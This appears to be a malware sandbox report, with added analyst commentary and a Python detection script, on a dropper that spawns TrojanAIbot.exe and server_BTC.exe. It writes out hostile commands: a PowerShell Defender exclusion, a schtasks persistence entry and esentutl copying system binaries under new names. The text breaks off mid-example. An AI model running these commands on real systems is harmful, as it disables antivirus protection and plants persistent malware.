Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E65908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 0_2_02E65908
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99824
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99708
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99589
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99478
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99320
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99166
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98927
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98725
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98603
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98483
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98368
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98260
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98117
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97989
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97846
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97719
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97609
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97496
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97382
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97274
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97160
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97035
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96912
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96772
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96646
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96522
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96281
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96059
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95943
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95818
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95693
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95568
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95443
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95318
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95193
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95055
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94941
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94818
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94696
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94582
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94459
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94334
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94209
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94084
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93960
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93844
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99725
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99616
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99505
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99382
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99261
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99148
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99039
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98907
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98803
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99349
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99157
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98999
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98869
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98758
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98649
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98531
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98377
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98238
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98089
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97963
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97828
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97713
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97603
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97479
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97335
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97079
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96552
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96360
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96152
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96008
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95868
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95747
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95592
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95416
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95272
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95135
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95030
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94898
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94777
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94635
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94473
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94153
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99790
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99586
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99417
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99297
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99183
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99076
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98962
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98850
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98723
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98333
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98182
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98071
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97964
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97854
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97743
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97635
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97524
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97417
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97307
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97197
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97087
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96979
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96869
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96759
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96650
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96540
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96432
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96323
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96213
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96103
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95994
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95881
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95761
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95640
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95519
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95386
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99886
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99771
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99632
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99517
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99376
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98968
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98832
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98708
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98583
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98458
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98333
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98208
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98083
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97958
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97833
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97708
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97583
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97458
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97333
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97208
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97083
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96958
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96833
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96708
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96560
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96451
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96297
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96189
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96068
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95943
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95818
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95693
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95568
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95443
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95318
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95193
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 95068
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94943
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94818
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94693
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94568
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94443
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94318
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94193
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94068
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93916
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93660
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93536
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93411
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93286
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
Source: 2jbMIxCFsK.exe, 00000000.00000002.2156227554.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2156227554.0000000000608000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 2jbMIxCFsK.exe, 00000000.00000002.2156227554.0000000000608000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWC
Source: neworigin.exe, 00000009.00000002.2320882998.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, Wisrysxl.PIF, 00000016.00000002.2308974209.00000000005B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information queried: ProcessInformation
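Two things in the "Thread delayed" entries above are worth reading correctly. The value 922337203685477 reported for server_BTC.exe and TrojanAIbot.exe is Int64.MaxValue / 10000, i.e. .NET's TimeSpan.MaxValue expressed in milliseconds, so those are unbounded waits that keep a thread alive, not timed evasion sleeps. The decreasing run from neworigin.exe (94443, 94318, 94193 ... ms, about 125 ms apart) is consistent with a loop that recomputes its wait from a fixed deadline roughly 94 s out, which is how a .NET stager commonly waits out a sandbox; that reading is an interpretation, the report itself only lists the values. The Python below is an added example, not part of the sandbox report: it parses such entries per process and separates the infinite-wait sentinel from a countdown loop. The sample input is copied from the entries above.

```python
import re
from collections import defaultdict

# TimeSpan.MaxValue in milliseconds: Int64.MaxValue ticks / 10,000 ticks per ms.
# A .NET wait with an "infinite" TimeSpan is reported by the sandbox as this value.
TIMESPAN_MAX_MS = (2**63 - 1) // 10_000          # 922337203685477

LINE_RE = re.compile(
    r"^Source:\s+(?P<proc>\S+)\s+Thread delayed: delay time:\s+(?P<ms>\d+)\s*$"
)

# Sample input: "Thread delayed" entries copied from the report section above.
SAMPLE = r"""
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94443
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94318
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94193
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 94068
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93916
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93660
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93536
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93411
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 93286
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Thread delayed: delay time: 922337203685477
"""


def parse_delays(text):
    """Group reported delays (ms) per source process, preserving report order."""
    delays = defaultdict(list)
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            delays[m.group("proc")].append(int(m.group("ms")))
    return dict(delays)


def classify(values):
    """Describe one process's waits: infinite sentinel, countdown loop, or irregular."""
    infinite = sum(1 for v in values if v >= TIMESPAN_MAX_MS)
    finite = [v for v in values if v < TIMESPAN_MAX_MS]
    info = {"infinite_waits": infinite, "finite_waits": len(finite), "pattern": "none"}
    if infinite and not finite:
        info["pattern"] = "infinite-wait"
    elif len(finite) >= 3 and all(a > b for a, b in zip(finite, finite[1:])):
        # Every wait is shorter than the previous one: a deadline-based loop.
        steps = [a - b for a, b in zip(finite, finite[1:])]
        info["pattern"] = "countdown"
        info["deadline_s"] = round(finite[0] / 1000)        # where the loop started
        info["step_ms_median"] = sorted(steps)[len(steps) // 2]  # typical slice
    elif finite:
        info["pattern"] = "irregular"
    return info


def summarize(text):
    """Map each process in the report excerpt to its sleep-pattern classification."""
    return {proc: classify(vals) for proc, vals in parse_delays(text).items()}


if __name__ == "__main__":
    for proc, info in summarize(SAMPLE).items():
        print(proc, info)
```

A countdown whose deadline lands past the sandbox's run budget is the case worth re-running with sleep skipping enabled; the infinite-wait sentinel on its own says nothing about evasion.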

Anti Debugging

Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E7F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent, 0_2_02E7F744
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Process queried: DebugPort
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Process queried: DebugPort
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E7894C LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_02E7894C
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process token adjusted: Debug
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Code function: 8_1_004015D7 SetUnhandledExceptionFilter, 8_1_004015D7
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Code function: 23_1_004015D7 SetUnhandledExceptionFilter, 23_1_004015D7
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Memory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Section unmapped: C:\Users\Public\Libraries\lxsyrsiW.pif base address: 400000
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section unmapped: C:\Windows\SysWOW64\timeout.exe base address: 400000
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section unmapped: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base address: 400000
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Memory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 3B2008
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 3CC008
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 3E8008
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 02:18 /du 23:59 /sc daily /ri 1 /f
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpBC1D.tmp.cmd""
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
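The "Memory allocated", "Section unmapped", "Memory written" and "Process created" entries above are the raw events behind the report's process-hollowing and LOLBin verdicts: the image section of lxsyrsiW.pif is unmapped at its image base 0x400000, an executable read/write region is allocated at that same base and written into, and esentutl /y <source> /d <destination> is used to copy cmd.exe and ping.exe into C:\Users\Public as alpha.pif and xpha.pif, so rules keyed on the original file names no longer fire. Two caveats a responder should keep in mind: Add-MpPreference only succeeds from an elevated context, so the exclusion line shows intent and the report does not say whether the exclusion took effect; and a section unmap at 0x400000 on its own (the timeout.exe and powershell.exe entries) is weaker evidence than the full unmap, allocate, write sequence seen against lxsyrsiW.pif. The Python below is an added example, not part of the report: it correlates the memory events per (source, target) pair into a hollowing verdict and runs command-line rules for the Defender exclusion, the esentutl copy, the schtasks persistence and execution from user-writable folders. The sample input is copied from the entries above; the rule names and the three-indicator threshold are the editor's choices.

```python
import re
from collections import defaultdict

# Sample input: process and memory events copied from the report section above.
SAMPLE = r"""
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
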